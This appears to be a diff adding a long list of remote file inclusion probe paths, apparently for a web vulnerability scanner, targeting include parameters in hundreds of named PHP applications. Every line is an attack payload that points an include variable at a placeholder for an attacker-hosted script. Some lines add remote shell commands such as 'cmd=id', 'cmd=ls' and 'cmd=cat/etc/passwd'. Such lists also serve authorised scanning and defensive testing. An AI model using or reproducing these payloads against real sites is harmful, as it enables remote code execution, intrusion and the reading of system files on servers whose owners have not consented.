+/files/compose-attach.php3?BSX_LIBDIR=XXpathXX
+/files/compose-menu.php3?BSX_LIBDIR=XXpathXX
+/files/compose-new.php3?BSX_LIBDIR=XXpathXX
+/files/compose-send.php3?BSX_LIBDIR=XXpathXX
+/files/folder-create.php3?BSX_LIBDIR=XXpathXX
+/files/folder-delete.php3?BSX_LIBDIR=XXpathXX
+/files/folder-empty.php3?BSX_LIBDIR=XXpathXX
+/files/folder-rename.php3?BSX_LIBDIR=XXpathXX
+/files/folders.php3?BSX_LIBDIR=XXpathXX
+/files/login.php3?err=hack&BSX_HTXDIR=XXpathXX
+/files/mainfile.php?page[path]=XXpathXX?&cmd=ls
+/files/mbox-list.php3?BSX_LIBDIR=XXpathXX
+/files/message-delete.php3?BSX_LIBDIR=XXpathXX
+/files/message-forward.php3?BSX_LIBDIR=XXpathXX
+/files/message-header.php3?BSX_LIBDIR=XXpathXX
+/files/message-print.php3?BSX_LIBDIR=XXpathXX
+/files/message-read.php3?BSX_LIBDIR=XXpathXX
+/files/message-reply.php3?BSX_LIBDIR=XXpathXX
+/files/message-replyall.php3?BSX_LIBDIR=XXpathXX
+/files/message-search.php3?BSX_LIBDIR=XXpathXX
+/findix/index.php?page=XXpathXX?&cmd=id
+/fishcart_v3/fc_functions/fc_example.php?docroot=XXpathXX
+/flushcmd/Include/editor/rich_files/class.rich.php?class_path=XXpathXX?
+/fonctions/template.php?repphp=XXpathXX?
+/fonctions_racine.php?chemin_lib=XXpathXX
+/footer.inc.php?settings[footer]=XXpathXX
+/footer.inc.php?tfooter=XXpathXX?
+/footer.php?footer_file=XXpathXX
+/footer.php?op[footer_body]=XXpathXX?
+/form.php?path=XXpathXX?&cmd=pwd
+/forum.php?cfg_file=1&fpath=XXpathXX?
+/forum/forum.php?view=XXpathXX
+/forum/forum82lib.php3?repertorylevel=XXpathXX?
+/forum/gesfil.php?repertorylevel=XXpathXX?
+/forum/lostpassword.php?repertorylevel=XXpathXX?
+/forum/mail.php?repertorylevel=XXpathXX?
+/forum/member.php?repertorylevel=XXpathXX?
+/forum/message.php?repertorylevel=XXpathXX?
+/forum/search.php?repertorylevel=XXpathXX?
+/forum/track.php?path=XXpathXX
+/frame.php?framefile=XXpathXX
+/ftp.php?path_local=XXpathXX
+/function.inc.php?path=XXpathXX
+/function.php?adminfolder=XXpathXX
+/function.php?gbpfad=XXpathXX
+/functions.php?include_path=XXpathXX
+/functions.php?pmp_rel_path=XXpathXX
+/functions.php?s[phppath]=XXpathXX
+/functions.php?set_path=XXpathXX?
+/functions/form.func.php?GLOBALS[PTH][classes]=XXpathXX?
+/functions/general.func.php?GLOBALS[PTH][classes]=XXpathXX?
+/functions/groups.func.php?GLOBALS[PTH][classes]=XXpathXX?
+/functions/js.func.php?GLOBALS[PTH][classes]=XXpathXX?
+/functions/prepend_adm.php?SETS[path][physical]=XXpathXX
+/functions/prepend_adm.php?SETS[path][physical]=XXpathXX?
+/functions/sections.func.php?GLOBALS[PTH][classes]=XXpathXX?
+/functions/users.func.php?GLOBALS[PTH][classes]=XXpathXX?
+/functions_mod_user.php?phpbb_root_path=XXpathXX?&cmd=ls
+/fusebox5.php?FUSEBOX_APPLICATION_PATH=XXpathXX
+/galerie.php?config[root_ordner]=XXpathXX?cmd=id
+/gallery/captionator.php?GALLERY_BASEDIR=XXpathXX
+/gallery/lib/content.php?include=XXpathXX?cmd=ls
+/gallery/theme/include_mode/template.php?galleryfilesdir=XXpathXX
+/gallerypath/index.php?includepath=XXpathXX
+/games.php?id=XXpathXX
+/games.php?scoreid=XXpathXX
+/gbook/includes/header.php?abspath=XXpathXX?
+/gemini/page/forums/bottom.php?lang=XXpathXX?
+/gen_m3u.php?phpbb_root_path=XXpathXX
+/genepi.php?topdir=XXpathXX
+/generate.php?ht_pfad=XXpathXX?
+/gepi/gestion/savebackup.php?filename=XXpathXX&cmd=cat/etc/passwd
+/gestArt/aide.php3?aide=XXpathXX?
+/get_session_vars.php?path_to_smf=XXpathXX
+/getpage.php?page=online&doc_path=XXpathXX
+/global.php?abs_path=XXpathXX?
+/gorum/dbproperty.php?appDirName=XXpathXX
+/gpb/include/db.mysql.inc.php?root_path=XXpathXX?
+/gpb/include/gpb.inc.php?root_path=XXpathXX?
+/graph.php?DOCUMENT_ROOT=XXpathXX?
+/gruppen.php?config[root_ordner]=XXpathXX?&cmd=id
+/handlers/email/mod.listmail.php?_PM_[path][handle]=XXpathXX
+/handlers/page/show.php?sous_rep=XXpathXX
+/head.php?CONFIG[MWCHAT_Libs]=XXpathXX?
+/header.inc.php?CssFile=XXpathXX
+/header.php?path=XXpathXX
+/header.php?wwwRoot=XXpathXX
+/help.php?CONFIG[MWCHAT_Libs]=XXpathXX?
+/help/index.php?show=XXpathXX
+/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
+/helperfunction.php?includedir=XXpathXX
+/hioxBannerRotate.php?hm=XXpathXX
+/hioxRandomAd.php?hm=XXpathXX
+/hioxstats.php?hm=XXpathXX
+/hioxupdate.php?hm=XXpathXX
+/home.php?a=XXpathXX
+/home.php?page=XXpathXX
+/home.php?pagina=XXpathXX
+/home/www/images/doc/index2.php?type=XXpathXX
+/home1.php?ln=XXpathXX
+/home2.php?ln=XXpathXX
+/hsList.php?subdir=XXpathXX?&cmd=ls
+/htdocs/gmapfactory/params.php?gszAppPath=XXpathXX
+/html/admin/modules/plugin_admin.php?_settings[pluginpath]=XXpathXX
+/hu/modules/reg-new/modstart.php?mod_dir=XXpathXX?
+/i_head.php?home=XXpathXX
+/i_nav.php?home=XXpathXX
+/iframe.php?file=XXpathXX
+/image.php?url=XXpathXX???
+/impex/ImpExData.php?systempath=XXpathXX
+/import.php?bibtexrootrel=XXpathXX?
+/importinfo.php?bibtexrootrel=XXpathXX?
+/in.php?returnpath=XXpathXX
+/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=XXpathXX
+/inc/config.inc.php?x[1]=XXpathXX
+/inc/design.inc.php?dir[data]=XXpathXX
+/inc/download_center_lite.inc.php?script_root=XXpathXX
+/inc/formmail.inc.php?script_root=XXpathXX
+/inc/gabarits.php?cfg_racine=XXpathXX
+/inc/header.inc.php?ficStyle=XXpathXX
+/inc/ifunctions.php?GLOBALS[phpQRootDir]=XXpathXX
+/inc/inc.php?cfg_racine=XXpathXX?
+/inc/indexhead.php?fileloc=XXpathXX?
+/inc/irayofuncs.php?irayodirhack=XXpathXX?
+/inc/libs/Smarty_Compiler.class.php?plugin_file=XXpathXX?
+/inc/libs/core/core.display_debug_console.php?plugin_file=XXpathXX?
+/inc/libs/core/core.load_plugins.php?plugin_file=XXpathXX?
+/inc/libs/core/core.load_resource_plugin.php?plugin_file=XXpathXX?
+/inc/libs/core/core.process_cached_inserts.php?plugin_file=XXpathXX?
+/inc/libs/core/core.process_compiled_include.php?plugin_file=XXpathXX?
+/inc/libs/core/core.read_cache_file.php?plugin_file=XXpathXX?
+/inc/linkbar.php?cfile=XXpathXX?
+/inc/login.php?pathCGX=XXpathXX
+/inc/logingecon.php?pathCGX=XXpathXX
+/inc/ltdialogo.php?pathCGX=XXpathXX
+/inc/mtdialogo.php?pathCGX=XXpathXX
+/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=XXpathXX?
+/inc/prepend.inc.php?path=XXpathXX?
+/inc/service.alert.inc.php?SPL_CFG[dirroot]=XXpathXX?
+/inc/settings.php?inc_dir=XXpathXX
+/inc/settings.ses.php?SPL_CFG[dirroot]=XXpathXX?
+/inc/shows.inc.php?cutepath=XXpathXX?
+/inc/sige_init.php?SYS_PATH=XXpathXX?
+/inc_group.php?include_path=XXpathXX?
+/inc_manager.php?include_path=XXpathXX?
+/inc_newgroup.php.php?include_path=XXpathXX?
+/inc_smb_conf.php?include_path=XXpathXX?
+/inc_user.php?include_path=XXpathXX?
+/include.php?_APP_RELATIVE_PATH=XXpathXX
+/include.php?gorumDir=XXpathXX
+/include.php?myng_root=XXpathXX
+/include.php?path=psp/user.php&site=XXpathXX
+/include.php?path[docroot]=XXpathXX
+/include.php?sunPath=XXpathXX
+/include/Beautifier/Core.php?BEAUT_PATH=XXpathXX
+/include/HTML_oben.php?include_path=XXpathXX
+/include/HTML_oben.php?include_path=XXpathXX?
+/include/SQuery/gameSpy2.php?libpath=XXpathXX
+/include/bbs.lib.inc.php?site_path=XXpathXX
+/include/class_yapbbcooker.php?cfgIncludeDirectory=XXpathXX
+/include/classes.php?INCLUDE_DIR=XXpathXX?
+/include/client.php?INCLUDE_DIR=XXpathXX?
+/include/cls_headline_prod.php?INCLUDE_PATH=XXpathXX
+/include/cls_listorders.php?INCLUDE_PATH=XXpathXX
+/include/cls_viewpastorders.php?INCLUDE_PATH=XXpathXX
+/include/common.php?XOOPS_ROOT_PATH=XXpathXX
+/include/common_functions.php?baros_path=XXpathXX?
+/include/config.inc.php?racine=XXpathXX
+/include/copyright.php?tsep_config[absPath]=XXpathXX?cmd=ls
+/include/customize.php?l=XXpathXX&text=Hello%20World
+/include/default_header.php?script_path=XXpathXX
+/include/define.php?INC_DIR=XXpathXX?
+/include/disp_form.php3?cfg_include_dir=XXpathXX?
+/include/disp_smileys.php3?cfg_include_dir=XXpathXX?
+/include/dom.php?path=XXpathXX
+/include/dtd.php?path=XXpathXX
+/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=XXpathXX?
+/include/engine/content/elements/menu.php?CONFIG[AdminPath]=XXpathXX
+/include/forms.php?INCLUDE_DIR=XXpathXX?
+/include/global.php?pfad=XXpathXX
+/include/header.php?cs_base_path=XXpathXX?
+/include/html/nettools.popup.php?DIR=XXpathXX
+/include/inc.foot.php?root=XXpathXX
+/include/inc_ext/spaw/dialogs/table.php?spaw_root=XXpathXX
+/include/inc_freigabe.php?include_path=XXpathXX?
+/include/inc_freigabe1.php?include_path=XXpathXX?
+/include/inc_freigabe3.php?include_path=XXpathXX?
+/include/include_stream.inc.php?include_path=XXpathXX
+/include/include_top.php?g_include=XXpathXX
+/include/includes.php?include_path=XXpathXX
+/include/index.php3?cfg_include_dir=XXpathXX?
+/include/init.inc.php?G_PATH=XXpathXX
+/include/issue_edit.php?INCLUDE_DIR=XXpathXX?
+/include/lib/lib_slots.php?main_path=XXpathXX
+/include/lib/lib_stats.php?main_path=XXpathXX?
+/include/lib/lib_users.php?main_path=XXpathXX?
+/include/little_news.php3?cfg_include_dir=XXpathXX?
+/include/livre_include.php?no_connect=lol&chem_absolu=XXpathXX?
+/include/loading.php?path_include=XXpathXX
+/include/mail.inc.php?root=XXpathXX
+/include/menu_builder.php?config[page_dir]=XXpathXX?
+/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=XXpathXX
+/include/monitoring/engine/MakeXML.php?fileOreonConf=XXpathXX?
+/include/parser.php?path=XXpathXX
+/include/pear/IT.php?basepath=XXpathXX?
+/include/pear/ITX.php?basepath=XXpathXX?
+/include/pear/IT_Error.php?basepath=XXpathXX?
+/include/phpxd/phpXD.php?appconf[rootpath]=XXpathXX?&cmd=id
+/include/prodler.class.php?sPath=XXpathXX???
+/include/scripts/export_batch.inc.php?DIR=XXpathXX
+/include/scripts/run_auto_suspend.cron.php?DIR=XXpathXX
+/include/scripts/send_email_cache.php?DIR=XXpathXX
+/include/startup.inc.php?root_path=XXpathXX?
+/include/themes/themefunc.php?myNewsConf[path][sys][index]=XXpathXX?
+/include/timesheet.php?config[include_dir]=XXpathXX
+/include/urights.php?CRM_inc=XXpathXX
+/includes/admin_board2.php?phpbb_root_path=XXpathXX?ls
+/includes/admin_logger.php?phpbb_root_path=XXpathXX?ls
+/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=XXpathXX?
+/includes/ajax_listado.php?urlModulo=XXpathXX
+/includes/archive/archive_topic.php?phpbb_root_path=XXpathXX?
+/includes/bbcb_mg.php?phpbb_root_path=XXpathXX?
+/includes/begin.inc.php?PagePrefix=XXpathXX
+/includes/blogger.php?path_prefix=XXpathXX
+/includes/class/class_tpl.php?cache_file=XXpathXX?
+/includes/class_template.php?quezza_root_path=XXpathXX
+/includes/classes/pctemplate.php?pcConfig[smartyPath]=XXpathXX?cmd
+/includes/common.inc.php?CONFIG[BASE_PATH]=XXpathXX
+/includes/common.php?module_root_path=XXpathXX?
+/includes/common.php?root=XXpathXX?
+/includes/common.php?root_path=XXpathXX?
+/includes/config.inc.php?racineTBS=XXpathXX
+/includes/config/master.inc.php?fm_data[root]=XXpathXX?
+/includes/connection.inc.php?PagePrefix=XXpathXX
+/includes/dbal.php?eqdkp_root_path=XXpathXX
+/includes/events.inc.php?PagePrefix=XXpathXX
+/includes/footer.html.inc.php?tc_config[app_root]=XXpathXX?
+/includes/footer.inc.php?PagePrefix=XXpathXX
+/includes/footer.php?PHPGREETZ_INCLUDE_DIR=XXpathXX
+/includes/functions.inc.php?sitepath=XXpathXX?
+/includes/functions.php?location=XXpathXX
+/includes/functions.php?phpbb_root_path=XXpathXX
+/includes/functions.php?phpbb_root_path=XXpathXX?
+/includes/functions/auto_email_notify.php?path_prefix=XXpathXX
+/includes/functions/html_generate.php?path_prefix=XXpathXX
+/includes/functions/master.inc.php?fm_data[root]=XXpathXX?
+/includes/functions/validations.php?path_prefix=XXpathXX
+/includes/functions_admin.php?phpbb_root_path=XXpathXX?
+/includes/functions_install.php?vwar_root=XXpathXX
+/includes/functions_kb.php?phpbb_root_path=XXpathXX?
+/includes/functions_mod_user.php?phpbb_root_path=XXpathXX?
+/includes/functions_portal.php?phpbb_root_path=XXpathXX?
+/includes/functions_user_viewed_posts.php?phpbb_root_path=XXpathXX?
+/includes/global.php?nbs=XXpathXX?
+/includes/header.inc.php?PagePrefix=XXpathXX
+/includes/header.inc.php?dateiPfad=XXpathXX
+/includes/include_once.php?include_file=XXpathXX
+/includes/init.php?includepath=XXpathXX?
+/includes/iplogger.php?phpbb_root_path=XXpathXX?ls
+/includes/kb_constants.php?module_root_path=XXpathXX
+/includes/lang/language.php?path_to_root=XXpathXX
+/includes/lib-account.inc.php?CONF_CONFIG_PATH=XXpathXX?
+/includes/lib-group.inc.php?CONF_CONFIG_PATH=XXpathXX?
+/includes/lib-log.inc.php?CONF_CONFIG_PATH=XXpathXX?
+/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=XXpathXX?
+/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=XXpathXX?
+/includes/lib-themes.inc.php?CONF_CONFIG_PATH=XXpathXX?
+/includes/logger_engine.php?phpbb_root_path=XXpathXX
+/includes/menuleft.inc.php?PagePrefix=XXpathXX
+/includes/mkb.php?phpbb_root_path=XXpathXX?ls
+/includes/morcegoCMS/adodb/adodb.inc.php?path=XXpathXX
+/includes/morcegoCMS/morcegoCMS.php?fichero=XXpathXX
+/includes/mx_common.php?module_root_path=XXpathXX?
+/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=XXpathXX
+/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=XXpathXX
+/includes/pafiledb_constants.php?module_root_path=XXpathXX
+/includes/pages.inc.php?PagePrefix=XXpathXX
+/includes/phpdig/includes/config.php?relative_script_path=XXpathXX
+/includes/profilcp_constants.php?module_root_path=XXpathXX?
+/includes/settings.inc.php?approot=XXpathXX
+/includes/template.php?myevent_path=XXpathXX
+/includes/themen_portal_mitte.php?phpbb_root_path=XXpathXX
+/includes/tumbnail.php?config[root_ordner]=XXpathXX?
+/includes/usercp_register.php?phpbb_root_path=XXpathXX?
+/includes/usercp_viewprofile.php?phpbb_root_path=XXpathXX?
+/includes/xhtml.php?d_root=XXpathXX?
+/index.php3?Application_Root=XXpathXX
+/index.php?1=lol&PAGES[lol]=XXpathXX
+/index.php?AML_opensite=XXpathXX
+/index.php?AMV_openconfig=1&AMV_serverpath=XXpathXX
+/index.php?CONFIG[MWCHAT_Libs]=XXpathXX?
+/index.php?ConfigDir=XXpathXX
+/index.php?DIR_PLUGINS=XXpathXX
+/index.php?G_JGALL[inc_path]=XXpathXX%00
+/index.php?HomeDir=XXpathXX
+/index.php?Lang=AR&Page=XXpathXX
+/index.php?Madoa=XXpathXX?
+/index.php?RP_PATH=XXpathXX
+/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=XXpathXX
+/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=XXpathXX
+/index.php?abg_path=XXpathXX?
+/index.php?abs_path=XXpathXX?
+/index.php?adduser=true&lang=XXpathXX
+/index.php?adodb=XXpathXX
+/index.php?ads_file=XXpathXX
+/index.php?arquivo=XXpathXX
+/index.php?back=XXpathXX
+/index.php?base==XXpathXX
+/index.php?basePath=XXpathXX
+/index.php?bibtexrootrel=XXpathXX?
+/index.php?blog_dc_path=XXpathXX
+/index.php?blog_theme=XXpathXX
+/index.php?body=XXpathXX
+/index.php?class_path=XXpathXX?
+/index.php?classified_path=XXpathXX?
+/index.php?cms=XXpathXX?
+/index.php?config["sipssys"]=XXpathXX
+/index.php?config[root_ordner]=XXpathXX?&cmd=id
+/index.php?config[root_ordner]=XXpathXX?cmd=id
+/index.php?config_atkroot=XXpathXX
+/index.php?configuration=XXpathXX
+/index.php?custom_admin_path=XXpathXX?
+/index.php?dateiPfad=XXpathXX?&cmd=ls
+/index.php?de=XXpathXX
+/index.php?dept=XXpathXX
+/index.php?do=XXpathXX
+/index.php?exec=XXpathXX?
+/index.php?ext=XXpathXX
+/index.php?faq_path=XXpathXX?&cmd=id
+/index.php?file_name[]=XXpathXX?
+/index.php?file_path=XXpathXX?
+/index.php?fileloc=XXpathXX
+/index.php?from=XXpathXX
+/index.php?func=XXpathXX?
+/index.php?function=XXpathXX
+/index.php?function=custom&custom=XXpathXX
+/index.php?gOo=XXpathXX
+/index.php?gen=XXpathXX
+/index.php?get=XXpathXX
+/index.php?home_name=XXpathXX
+/index.php?ilang=XXpathXX?
+/index.php?inc_dir=XXpathXX
+/index.php?inc_dir=XXpathXX?
+/index.php?includeDir=XXpathXX
+/index.php?includeFooter=XXpathXX
+/index.php?includesdir=XXpathXX
+/index.php?insPath=XXpathXX
+/index.php?lang=XXpathXX
+/index.php?language=XXpathXX?
+/index.php?language=en&main_page=XXpathXX
+/index.php?lizge=XXpathXX?&cmd=ls
+/index.php?lng=XXpathXX
+/index.php?load=XXpathXX
+/index.php?loadpage=XXpathXX
+/index.php?main_tabid=1&main_content=XXpathXX
+/index.php?may=XXpathXX
+/index.php?middle=XXpathXX
+/index.php?mode=XXpathXX
+/index.php?modpath=XXpathXX
+/index.php?module=PostWrap&page=XXpathXX
+/index.php?mosConfig_absolute_path=XXpathXX
+/index.php?news7["functions"]=XXpathXX
+/index.php?news_include_path=XXpathXX
+/index.php?open=XXpathXX
+/index.php?option=com_custompages&cpage=XXpathXX?
+/index.php?page=XXpathXX
+/index.php?page=XXpathXX%00
+/index.php?page=XXpathXX?
+/index.php?pageXXpathXX
+/index.php?page[path]=XXpathXX?&cmd=ls
+/index.php?pagename=XXpathXX
+/index.php?pager=XXpathXX
+/index.php?pagina=XXpathXX?
+/index.php?path_to_folder=XXpathXX?cmd=id
+/index.php?pg=XXpathXX?
+/index.php?phpbb_root_path=XXpathXX
+/index.php?plugin=XXpathXX
+/index.php?principal=XXpathXX
+/index.php?proMod=XXpathXX
+/index.php?proMod=XXpathXX?cmd
+/index.php?project=XXpathXX
+/index.php?repinc=XXpathXX?
+/index.php?root_prefix=XXpathXX
+/index.php?root_prefix=XXpathXX?
+/index.php?section=XXpathXX
+/index.php?site=XXpathXX
+/index.php?site_path=XXpathXX
+/index.php?styl[top]=XXpathXX??
+/index.php?template=XXpathXX?
+/index.php?templates_dir=XXpathXX?
+/index.php?theme=XXpathXX
+/index.php?themepath=XXpathXX?
+/index.php?themesdir=XXpathXX
+/index.php?this_path=XXpathXX?
+/index.php?txt=XXpathXX
+/index.php?up=XXpathXX
+/index.php?url=XXpathXX
+/index.php?w=XXpathXX
+/index.php?way=XXpathXX??????????????
+/index1.php?=XXpathXX
+/index1.php?inc=XXpathXX
+/index1.php?inhalt=XXpathXX
+/index2.php?=XXpathXX
+/index2.php?content=XXpathXX
+/index2.php?s=XXpathXX
+/index2.php?x=XXpathXX
+/indexinfo.php?bibtexrootrel=XXpathXX?
+/indexk.php?lib_path=XXpathXX?
+/info.php?file=XXpathXX
+/inhalt.php?dateien[news]=XXpathXX?
+/init.php?API_HOME_DIR=XXpathXX
+/init.php?scriptpath=XXpathXX?
+/initialize.php?hmail_config[includepath]=XXpathXX&cmd=dir
+/initiate.php?abs_path=XXpathXX
+/install.php?_NE[AbsPath]=XXpathXX
+/install.php?install_dir=XXpathXX
+/install/config.php?path=XXpathXX
+/install/di.php?pathtoserverdata=XXpathXX
+/install/index.php?content_php=XXpathXX
+/install/install3.php?database=none&cabsolute_path=XXpathXX
+/integration/shortstat/configuration.php?SPL_CFG[dirroot]=XXpathXX?
+/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=XXpathXX?
+/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=XXpathXX?
+/interface/billing/billing_process.php?srcdir=XXpathXX?
+/interface/editors/-custom.php?bField[bf_data]=XXpathXX
+/interface/editors/custom.php?bField[bf_data]=XXpathXX
+/interface/new/new_patient_save.php?srcdir=XXpathXX?
+/intern/admin/?rootdir=XXpathXX
+/intern/admin/other/backup.php?admin=1&rootdir=XXpathXX
+/intern/clan/member_add.php?rootdir=XXpathXX
+/intern/config/forum.php?rootdir=XXpathXX
+/intern/config/key_2.php?rootdir=XXpathXX
+/ip.inc.php?type=1&cgipath=XXpathXX
+/ipeer_site/?page=XXpathXX?
+/joinus.php?vwar_root=XXpathXX
+/joinus.php?vwar_root=XXpathXX?&cmd=ls
+/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=XXpathXX?
+/joomla_path/components/com_articles.php?absolute_path=XXpathXX?
+/js/bbcodepress/bbcode-form.php?BBCODE_path=XXpathXX
+/js/wptable-tinymce.php?ABSPATH=XXpathXX
+/jscript.php?my_ms[root]=XXpathXX?
+/kernel/class/ixpts.class.php?IXP_ROOT_PATH=XXpathXX
+/kernel/loadkernel.php?installPath=XXpathXX
+/kmitaadmin/kmitam/htmlcode.php?file=XXpathXX?
+/ktmlpro/includes/ktedit/toolbar.php?dirDepth=XXpathXX
+/lang/leslangues.php?fichier=XXpathXX
+/lang_english/lang_main_album.php?phpbb_root_path=XXpathXX?a=
+/language/lang_english/lang_activity.php?phpbb_root_path=XXpathXX
+/language/lang_english/lang_admin_album.php?phpbb_root_path=XXpathXX?a=
+/language/lang_german/lang_admin_album.php?phpbb_root_path=XXpathXX?a=
+/language/lang_german/lang_main_album.php?phpbb_root_path=XXpathXX?a=
+/latestposts.php?forumspath=XXpathXX
+/latex.php?bibtexrootrel=XXpathXX?
+/layout/default/params.php?gConf[dir][layouts]=XXpathXX?
+/ldap/authldap.php?includePath=XXpathXX
+/learnPath/include/scormExport.inc.php?includePath=XXpathXX
+/lib.editor.inc.php?sys_path=XXpathXX?
+/lib/Loggix/Module/Calendar.php?pathToIndex=XXpathXX
+/lib/Loggix/Module/Comment.php?pathToIndex=XXpathXX
+/lib/Loggix/Module/Rss.php?pathToIndex=XXpathXX
+/lib/Loggix/Module/Trackback.php?pathToIndex=XXpathXX
+/lib/action/rss.php?lib=XXpathXX?
+/lib/activeutil.php?set[include_path]=XXpathXX?
+/lib/addressbook.php?GLOBALS[basedir]=XXpathXX
+/lib/armygame.php?libpath=XXpathXX
+/lib/authuser.php?root=XXpathXX
+/lib/base.php?BaseCfg[BaseDir]=XXpathXX
+/lib/connect.php?root=XXpathXX
+/lib/connected_users.lib.php3?ChatPath=XXpathXX
+/lib/connected_users.lib.php3?ChatPath=XXpathXX?
+/lib/db/mysql.class.php?root=XXpathXX
+/lib/db/postgres.class.php?root=XXpathXX
+/lib/functions.php?DOC_ROOT=XXpathXX
+/lib/googlesearch/GoogleSearch.php?APP[path][lib]=XXpathXX?
+/lib/header.php?DOC_ROOT=XXpathXX
+/lib/language.php?_LIB_DIR=XXpathXX
+/lib/live_status.lib.php?ROOT=XXpathXX
+/lib/misc.php?root=XXpathXX
+/lib/nl/nl.php?g_strRootDir=XXpathXX
+/lib/obj/collection.class.php?GLOBALS[application][app_root]=XXpathXX
+/lib/obj/content_image.class.php?GLOBALS[application][app_root]=XXpathXX
+/lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX
+/lib/pcltrace.lib.php?g_pcltar_lib_dir=XXpathXX
+/lib/rs.php?rootpath=XXpathXX
+/lib/selectlang.php?BBC_LANGUAGE_PATH=XXpathXX
+/lib/smarty/SmartyFU.class.php?system[smarty][dir]=XXpathXX?
+/lib/static/header.php?set_menu=XXpathXX
+/lib/tpl.inc.php?conf[classpath]=XXpathXX
+/libraries/comment/postComment.php?path[cb]=XXpathXX?a=
+/libraries/database.php?path=XXpathXX???
+/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=XXpathXX
+/libraries/pcl/pcltar.php?g_pcltar_lib_dir=XXpathXX
+/library/authorize.php?login_form=XXpathXX?
+/library/translation.inc.php?GLOBALS[srcdir]=XXpathXX?
+/libs/db.php?path_local=XXpathXX
+/libs/ftp.php?path_local=XXpathXX
+/libs/lom.php?ETCDIR=XXpathXX
+/libsecure.php?abs_path=XXpathXX?
+/license.php?CONFIG[MWCHAT_Libs]=XXpathXX?
+/link_main.php?phpbb_root_path=XXpathXX
+/linkadmin.php?page=XXpathXX?
+/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=XXpathXX?
+/list.php?phpbb_root_path=XXpathXX
+/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=XXpathXX
+/lms_path/modules/welcome.php?_LIB_DIR=XXpathXX
+/load_lang.php?_SERWEB[configdir]=XXpathXX
+/load_lang.php?_SERWEB[serwebdir]=XXpathXX
+/load_phplib.php?_PHPLIB[libdir]=XXpathXX
+/loader.php?GLOBALS=XXpathXX
+/local/lib/lcUser.php?LIBDIR=XXpathXX?
+/log.php?bibtexrootrel=XXpathXX?
+/login.php3?cl_headers=XXpathXX
+/login.php?base_dir=XXpathXX
+/login.php?blog_theme=XXpathXX
+/login.php?langfile=XXpathXX
+/login.php?pachtofile=XXpathXX
+/login.php?srcdir=XXpathXX?
+/login.php?value=XXpathXX??
+/lovecms/install/index.php?step=XXpathXX?
+/m2f/m2f_cron.php?m2f_root_path=XXpathXX
+/m2f/m2f_forum.php?m2f_root_path=XXpathXX
+/m2f/m2f_mailinglist.php?m2f_root_path=XXpathXX
+/m2f/m2f_phpbb204.php?m2f_root_path=XXpathXX
+/maguz.php?site=XXpathXX
+/mail/childwindow.inc.php?form=XXpathXX?
+/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=XXpathXX?
+/mail_this_entry/mail_autocheck.php?pm_path=XXpathXX?&cmd=ls
+/main.inc.php?pathtoscript=XXpathXX
+/main.php?config[search_disp]=true&include_dir=XXpathXX
+/main.php?id=XXpathXX
+/main.php?include_path=XXpathXX?
+/main.php?pageURL=XXpathXX
+/main.php?pagina=XXpathXX
+/main/forum/komentar.php?site_path=XXpathXX
+/main/main.php?pi=XXpathXX
+/main/ppcbannerclick.php?INC=XXpathXX?
+/main/ppcclick.php?INC=XXpathXX?
+/main_prepend.php?_SERWEB[functionsdir]=XXpathXX
+/mainpage.php?docroot=XXpathXX?cmd
+/mamboleto.php?mosConfig_absolute_path=XXpathXX
+/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=XXpathXX
+/manage_songs.php?foing_root_path=XXpathXX
+/manager/admin/index.php?MGR=XXpathXX
+/manager/admin/p_ins.php?MGR=XXpathXX
+/manager/admin/u_ins.php?MGR=XXpathXX
+/manager/articles.php?_PX_config[manager_path]=XXpathXX
+/manager/static/view.php?propID=0&INC=XXpathXX
+/master.php?root_path=XXpathXX
+/mcNews/admin/header.php?skinfile=XXpathXX
+/mcf.php?content=XXpathXX
+/mcnews/admin/install.php?l=XXpathXX
+/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=XXpathXX
+/member.php?vwar_root=XXpathXX
+/member/usercp_menu.php?script_folder=XXpathXX
+/members/index.php?INC=XXpathXX?
+/members/registration.php?INC=XXpathXX?
+/members_help.php?hlp=XXpathXX?
+/membres/membreManager.php?include_path=XXpathXX?
+/menu.php3?cl_headers=XXpathXX
+/menu.php?functions_file=XXpathXX
+/mep/frame.php?chem=XXpathXX?
+/microcms/includes/file_manager/special.php?fm_includes_special=XXpathXX
+/middle.php?file=XXpathXX
+/migrateNE2toNE3.php?_NE[AbsPath]=XXpathXX
+/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=XXpathXX?
+/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=XXpathXX?
+/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=XXpathXX?
+/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=XXpathXX?
+/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=XXpathXX?
+/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=XXpathXX?
+/mini-pub.php/front-end/img.php?sFileName=XXpathXX?
+/minimal/wiki.php?page=XXpathXX?
+/misc/function.php3?path=XXpathXX?
+/mitglieder.php?config[root_ordner]=XXpathXX?&cmd=id
+/mkportal/include/user.php?MK_PATH=XXpathXX
+/mkportal/include/user.php?MK_PATH=XXpathXX?
+/mod/authent.php4?rootpath=XXpathXX
+/mod/image/index.php?config[pathMod]=XXpathXX
+/mod/liens/index.php?config[pathMod]=XXpathXX
